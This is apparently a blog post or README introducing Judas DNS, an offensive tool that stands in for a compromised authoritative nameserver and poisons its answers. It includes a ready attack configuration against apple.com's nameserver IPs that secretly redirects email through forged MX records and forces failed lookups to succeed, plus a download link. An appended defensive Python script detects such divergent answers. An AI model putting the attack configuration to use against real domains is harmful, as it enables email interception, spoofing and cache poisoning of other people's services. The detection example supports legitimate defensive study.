Nameserver DNS Poisoning using Judas DNS

Judas DNS is a nameserver DNS poisoning attack tool that functions as a DNS proxy server, built to be deployed in place of a taken-over nameserver to carry out targeted exploitation. Judas works by proxying all DNS queries to the legitimate nameservers for a domain.

The magic comes with Judas's rule configurations, which let you change DNS responses depending on source IP or DNS query type. This allows an attacker to configure a malicious nameserver to do things like selectively re-route inbound email coming from specified source IP ranges (through modified MX records), set extremely long TTLs to keep poisoned records cached, and more.

How to use the Judas DNS Nameserver DNS Poisoning Tool

The following is an example configuration for Judas for an example scenario where an attacker has compromised/taken over one of Apple's authoritative nameservers (for apple.com):

{
    "version": "1.0.0",
    "port": 2248,
    "dns_query_timeout": 10000,
    "target_nameservers": [ "17.254.0.59", "17.254.0.50", "17.112.144.50", "17.112.144.59", "17.171.63.30", "17.171.63.40", "17.151.0.151", "17.151.0.152" ],
    "rules": [
        {
            "name": "Secretly redirect all emails coming from 127.0.0.1!",
            "query_type_matches": [ "MX" ],
            "ip_range_matches": [ "127.0.0.1/32" ],
            "modifications": [
                {
                    "answer": [
                        {
                            "name": "apple.com",
                            "type": 15,
                            "class": 1,
                            "ttl": 10,
                            "priority": 10,
                            "exchange": "hacktheplace.localhost"
                        }
                    ]
                }
            ]
        },
        {
            "name": "Make all responses NOERROR even if they've failed.",
            "query_type_matches": [ "*" ],
            "modifications": [
                {
                    "header": {
                        "rcode": 0
                    }
                }
            ]
        }
    ]
}

The configuration values above are as follows:

  • version: The configuration file format version (for now it's always 1.0.0).
  • port: The port Judas should run on.
  • dns_query_timeout: How long to wait, in milliseconds, before giving up on a reply from the upstream target nameserver.
  • target_nameservers: The legitimate nameservers for your target domain; all DNS queries will be sent here from Judas on behalf of all requesting clients.
  • rules: A list of rules with modifications to the DNS response to apply if matched.
    • name: Name of a given rule.
    • query_type_matches: List of query types to match on, such as CNAME, A, etc. A wildcard * can also be specified to match any query type.
    • ip_range_matches: List of IP ranges to match on. For selectively spoofing responses to a specific range of IPs.
    • modifications: See the “Modifications” section of this README.
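
From the defender's side, the changes these rules make (rewritten MX answers, inflated TTLs, rcode forced to 0) show up as one authoritative nameserver disagreeing with its peers. The following Python check is an added example, not part of Judas DNS or the original article; the observation format, the names ns1 to ns4 and example.test, and the ttl_factor threshold are assumptions, and the sample data is constructed.

```python
from collections import Counter, defaultdict
from statistics import median

def obs(ns, qname, qtype, rcode, ttl, *rdata):
    """One answer as seen from one authoritative nameserver."""
    return {"ns": ns, "q": (qname, qtype), "rcode": rcode, "ttl": ttl,
            "rdata": tuple(sorted(rdata))}

HONEST = ("ns1", "ns2", "ns3")
# Constructed sample data (not real measurements); ns4 plays the proxy.
SAMPLE = (
    [obs(n, "example.test", "MX", 0, 3600, "10 mail.example.test.") for n in HONEST]
    + [obs("ns4", "example.test", "MX", 0, 3600, "10 mx.other.invalid.")]
    + [obs(n, "missing.example.test", "A", 3, 0) for n in HONEST]  # NXDOMAIN
    + [obs("ns4", "missing.example.test", "A", 0, 0)]              # forced NOERROR
    + [obs(n, "www.example.test", "A", 0, 300, "192.0.2.10") for n in HONEST]
    + [obs("ns4", "www.example.test", "A", 0, 604800, "192.0.2.10")]
)

def find_divergent(observations, ttl_factor=10):
    """Return sorted (ns, qname, qtype, reason) for answers that disagree
    with the majority of nameservers on rcode, record data or TTL."""
    groups = defaultdict(list)
    for o in observations:
        groups[o["q"]].append(o)
    findings = []
    for (qname, qtype), group in groups.items():
        # Majority vote needs at least three nameservers to be meaningful.
        rcode = Counter(o["rcode"] for o in group).most_common(1)[0][0]
        rdata = Counter(o["rdata"] for o in group).most_common(1)[0][0]
        typical_ttl = median(o["ttl"] for o in group)
        for o in group:
            if o["rcode"] != rcode:
                reason = "rcode"
            elif o["rdata"] != rdata:
                reason = "rdata"
            elif o["ttl"] > ttl_factor * typical_ttl:
                reason = "ttl"
            else:
                continue
            findings.append((o["ns"], qname, qtype, reason))
    return sorted(findings)

if __name__ == "__main__":
    for finding in find_divergent(SAMPLE):
        print(finding)
```

Because rules can match on source IP (ip_range_matches), observations need to be collected from several network vantage points; a single monitoring host may never receive the modified answer.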

You can download Judas DNS here:

JudasDNS-master.zip
